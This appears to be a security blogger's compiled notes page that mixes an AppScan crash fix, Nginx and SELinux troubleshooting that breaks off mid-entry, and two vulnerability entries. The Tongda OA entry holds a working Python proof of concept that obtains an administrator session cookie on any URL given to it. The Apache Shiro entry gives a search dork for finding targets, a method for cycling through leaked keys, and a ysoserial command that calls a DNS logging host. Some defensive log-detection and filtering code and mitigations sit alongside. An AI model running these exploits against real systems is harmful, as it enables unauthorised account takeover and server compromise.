Since I reinstalled the OS, I had to reinstall all my software as well. After installing AppScan 10 (not yet cracked), opening AppScan crashed as soon as the loading screen reached "正在装入:GuiLogic" (Loading: GuiLogic). At first I assumed Huorong and 360 were killing the process in the background, but there were no related logs at all.
I installed the same version of Win10 in a VM and the problem did not reproduce, which was odd. Then I found this post on 52pojie: https://www.52pojie.cn/thread-969220-1-1.html. Open Computer > Properties and check the computer name: the local machine's name contained Chinese characters, while the VM's did not. After changing the local computer name, AppScan opened normally.
It seems a lot of foreign software really does not handle Chinese and special characters well (Burp Suite also has all kinds of problems with Chinese characters).
Reproducing the Tongda OA arbitrary user login vulnerability
Preface
One unit's system was reported as having the Tongda OA arbitrary user login vulnerability. Since the system is hosted in the cloud rather than locally, I helped verify it.
1. Vulnerability overview
An unauthenticated attacker can log in as any user (including admin) by constructing requests; once logged in, they can go on to upload malicious files and take control of the web server.
Analysis: https://mp.weixin.qq.com/s/yJuLhC1GxkMbGL0mRORIoA
2. Affected versions
Tongda OA 2017
Tongda OA V11.X to V11.5
3. Reproduction
PoC logic
Step 1: GET http://xxx.com/general/login_code.php to obtain the uid.
Step 2: POST http://xxx.com/logincheck_code.php, using the uid to obtain a cookie.
Step 3: GET http://xxx.com/general/index.php?is_modify_pwd=1, substituting the obtained cookie, to log in as any user.
PoC for obtaining the cookie:
    import requests
    import argparse
    import random
    import warnings
    import sys
    import re


    class Tond_da_poc():
        def __init__(self, url):
            # Strip a trailing slash so the path constants below do not produce "//"
            self.url = url.rstrip('/')
            # Pool of User-Agent strings; one is picked at random per run
            self.user_agent = [
                "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
                "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
                "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
                "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
                "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
                "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
                "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
                "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
                "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
                "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
                "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
                "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
                "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
                "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
                "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
                "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
                "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
                "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
                "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
                "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
                "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
                "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
                "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
                "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
                "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
                "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
                "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
                "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
                "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
                "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
                "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
                "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
                "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
                "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
            ]
            self.payload_url_uid = '/general/login_code.php'
            self.payload_url_cookie = '/logincheck_code.php'
            # The original used the key 'headers', which sends a header literally named "headers";
            # the intent is clearly the User-Agent header
            self.headers = {'User-Agent': random.choice(self.user_agent)}
            self.vulhub = False

        def get_tongda_uid(self):
            # Step 1: GET login_code.php and extract the code_uid value from the response body
            url = self.url + self.payload_url_uid
            r = requests.get(url=url, headers=self.headers, verify=False).text
            print('[*] Checking current URL UID')
            uid_compile = re.compile(r'"({.*})"')
            try:
                get_uid = re.findall(uid_compile, r)
                if len(get_uid) > 0:
                    print('【+】 Get current uid successfully', get_uid[0])
                    self.vulhub = True
                    return get_uid[0]
                else:
                    print('[-] Failed to get current UID')
            except Exception as error:
                print('[-] Error while fetching UID:', error)
            return None

        def get_tongda_cookies(self):
            # Step 2: POST the uid to logincheck_code.php and read the session cookie from the response
            uid = self.get_tongda_uid()
            if uid is None:
                return
            url = self.url + self.payload_url_cookie
            data = {'CODEUID': uid, 'UID': 1}
            r = requests.post(url, data=data, headers=self.headers, verify=False)
            tongda_cookie = r.headers.get('Set-Cookie')
            if tongda_cookie is not None and self.vulhub:
                print('【+】 Get session of current URL successfully', tongda_cookie)
            else:
                print('[-] Failed to get session of current URL')

        def run(self):
            self.get_tongda_cookies()


    if __name__ == '__main__':
        # Silence the InsecureRequestWarning raised by verify=False
        warnings.simplefilter("ignore")
        if len(sys.argv) < 2:
            print('usage: python ' + str(sys.argv[0]) + ' -h')
        else:
            parser = argparse.ArgumentParser()
            parser.description = '通达OA < 11.5版本 任意用户登录'
            parser.add_argument('-u', help="待检测url -> example http://127.0.0.1", type=str, dest='check_url')
            args = parser.parse_args()
            aa = Tond_da_poc(args.check_url)
            aa.run()
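For the defender's side of the three-step chain above, here is an added detection example (not from the original post, and not Tongda's code) that walks Nginx/Apache combined-format access log lines and flags any client that issues the three requests in order. The log lines are constructed samples; the IPs and timestamps are made up.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Apr/2020:10:01:02 +0800] "GET /general/login_code.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.5 - - [20/Apr/2020:10:01:03 +0800] "POST /logincheck_code.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.5 - - [20/Apr/2020:10:01:04 +0800] "GET /general/index.php?is_modify_pwd=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Apr/2020:10:02:00 +0800] "GET /general/login_code.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Apr/2020:10:02:30 +0800] "GET /general/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Client IP, method, path and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The three requests of the login-bypass chain, in the order the post describes them
CHAIN = (
    ("GET", "/general/login_code.php"),
    ("POST", "/logincheck_code.php"),
    ("GET", "/general/index.php?is_modify_pwd=1"),
)


def find_login_bypass_chains(log_text):
    """Return the set of client IPs that issued all three chain requests in order."""
    progress = defaultdict(int)   # ip -> index of the next expected chain step
    flagged = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                # skip lines that are not combined-format requests
        ip = m["ip"]
        step = progress[ip]
        if step < len(CHAIN) and (m["method"], m["path"]) == CHAIN[step]:
            progress[ip] = step + 1
            if progress[ip] == len(CHAIN):
                flagged.add(ip)
    return flagged


if __name__ == "__main__":
    print("clients completing the chain:", sorted(find_login_bypass_chains(SAMPLE_LOG)))
```

A hit on step 2 alone (a POST to logincheck_code.php from a client that never went through the normal login form) is already worth an alert; the full chain is the high-confidence case.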
2020 Attack-Defense Exercise Arsenal
Foreword
This article comes from Dou Xiang (斗象) and is reproduced here as a backup only.
Apache Shiro RememberMe deserialization leading to command execution (Shiro-550, CVE-2016-4437)
1. Overview
Apache Shiro is a common enterprise Java security framework; its vulnerability played a significant role in the 2019 attack-defense exercises.
2. Affected component
Apache Shiro (because of leaked keys, some Shiro versions above 1.2.4 are also affected)
3. Fingerprint
set-Cookie: rememberMe=deleteMe
or the string "shiro" in the URL.
Sometimes the server does not return rememberMe=deleteMe on its own; just send the request directly.
4. Fofa dork
app="Apache-Shiro"
5. Analysis
[Vulnerability analysis] Shiro RememberMe 1.2.4 deserialization leading to command execution
https://paper.seebug.org/shiro-rememberme-1-2-4/
6. Exploitation
wyzxxz/shiro_rce: one-click tool for Shiro RCE via deserialization
https://github.com/wyzxxz/shiro_rce
Apache Shiro echo PoC rework plan
https://mp.weixin.qq.com/s/-ODg9xL838wro2S_NK30bw
7. Exploitation tips
1. Iterate over multiple leaked keys; this really does work in practice.
Extending the Shiro deserialization vulnerability: an upgraded Shiro can still be shelled
https://mp.weixin.qq.com/s/NRx-rDBEFEbZYrfnRw2iDw
Shiro 100 Keys
https://mp.weixin.qq.com/s/sclSe2hWfhv8RZvQCuI8LA
2. Use URLDNS to speed up detection. URLDNS is the most broadly applicable gadget (it is not affected by the JDK version or security policy, unless network restrictions block outbound DNS), and the serialized content can be generated in advance with ysoserial:
java -jar target/ysoserial-0.0.5-SNAPSHOT-all.jar URLDNS "http://1234567890.test.ceye.io" > urldns.ser
Then replace the urldns address in the serialized content using a placeholder plus a hash of the target URL. This speeds up detection, and later checks no longer need ysoserial. For example, 1234567890.test.ceye.io can be replaced with md5('www.qq.com').hexdigest()[:10].test.ceye.io, i.e. 9d2c68d82d.test.ceye.io. Record the hash in advance:
9d2c68d82d www.qq.com
A hash table lookup then tells you which target a DNSLOG entry came from, and performance improves considerably.
3. If the target is known to use Shiro, the error logic of Shiro-721 can be used to iterate keys (— 星光哥). This way, even if DNS cannot reach out of the network, whether rememberMe=deleteMe is returned can be used to determine whether the Shiro key is correct, provided the server echoes rememberMe=deleteMe.
8. Mitigations
1. Upgrade Shiro to the latest version.
2. Upgrade the corresponding JDK to 8u191/7u201/6u211/11.0.1 or above.
3. Have the WAF block requests whose Cookie carries an overly long rememberMe value.
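As an added example (not from the Dou Xiang article or from Shiro), the following implements mitigation 3 and the fingerprint from section 3 on the defender's side: it fingerprints Shiro from a response's Set-Cookie header (useful for asset inventory) and classifies an incoming Cookie header as allow/block based on the rememberMe value. The 1024-byte threshold is an assumption chosen for illustration: a real rememberMe cookie is base64 of a short AES ciphertext, while deserialization payloads run to kilobytes.

```python
import base64
import binascii

# Assumed threshold (not from the article): legitimate rememberMe values are a few hundred
# bytes, gadget-chain payloads are far larger. Tune it against your own traffic.
MAX_REMEMBERME_LEN = 1024


def extract_rememberme(cookie_header):
    """Return the rememberMe value from a raw Cookie header string, or None if absent."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "rememberMe":
            return value
    return None


def looks_like_shiro(response_headers):
    """Fingerprint from the article: the response sets rememberMe=deleteMe.

    response_headers is a list of (name, value) pairs as a proxy or WAF would see them.
    """
    for name, value in response_headers:
        if name.lower() == "set-cookie" and value.strip().startswith("rememberMe=deleteMe"):
            return True
    return False


def classify_request(cookie_header):
    """Return 'block' for an oversized or malformed rememberMe cookie, 'allow' otherwise."""
    value = extract_rememberme(cookie_header)
    if value is None or value == "deleteMe":
        return "allow"                      # no remember-me token, or Shiro's own clear marker
    if len(value) > MAX_REMEMBERME_LEN:
        return "block"                      # mitigation 3: reject overly long rememberMe values
    try:
        base64.b64decode(value, validate=True)
    except (ValueError, binascii.Error):
        return "block"                      # rememberMe must be base64; anything else is bogus
    return "allow"


if __name__ == "__main__":
    print(classify_request("JSESSIONID=abc; rememberMe=" + "A" * 4096))
    print(looks_like_shiro([("Set-Cookie", "rememberMe=deleteMe; Path=/; HttpOnly")]))
```

Blocking on length only stops the large gadget chains; pairing it with the JDK and Shiro upgrades in items 1 and 2 is what actually closes the hole.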
Nginx error: client intended to send too large body
Problem:
After migrating the server, large files could no longer be uploaded. The Nginx log showed the following error:
[root@localhost ~]# cat /var/log/nginx/error.log
2020/04/16 10:12:40 [error] 14173#14173: *2680 client intended to send too large body: 2045031 bytes, client: 192.168.1.1, server: localhost, request: "POST /index.php?mod=explorer&op=ajax&operation=uploads&container=584 HTTP/1.1", host: "xx.cn", referrer: "http://xx.cn/"
So Nginx is limiting the size of uploaded files.
Solution:
The default Nginx configuration does not set an upload file size limit. Edit the Nginx configuration file and add the client_max_body_size directive inside the http {} block to set the maximum upload size:
[root@localhost ~]# vi /etc/nginx/nginx.conf
user nginx;
worker_processes 1;
error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;
events {
    worker_connections 1024;
}
http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                    '$status $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';
    access_log /var/log/nginx/access.log main;
    sendfile on;
    #tcp_nopush on;
    keepalive_timeout 65;
    #gzip on;
    client_max_body_size 100m;
    include /etc/nginx/conf.d/*.conf;
}
[root@localhost ~]# nginx -s reload
After reloading Nginx, uploads worked normally.
SELinux's effect on Nginx
On a freshly installed CentOS 7 with Nginx installed via yum, I changed the default root path /usr/share/nginx/html in the configuration file under /etc/nginx/conf.d, and found that no matter which path I changed it to, even with 777 permissions, every request returned 403:
I tried changing the user in the Nginx configuration file to root:
[root@localhost ~]# cat /etc/nginx/nginx.conf
user root;
worker_processes 1;
error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;
events {
    worker_connections 1024;
}
http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                    '$status $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';
    access_log /var/log/nginx/access.log main;
    sendfile on;
    #tcp_nopush on;
    keepalive_timeout 65;
    #gzip on;
    include /etc/nginx/conf.d/*.conf;
}
After reloading the Nginx configuration and restarting Nginx, the problem persisted. Check the Nginx status and the configuration file: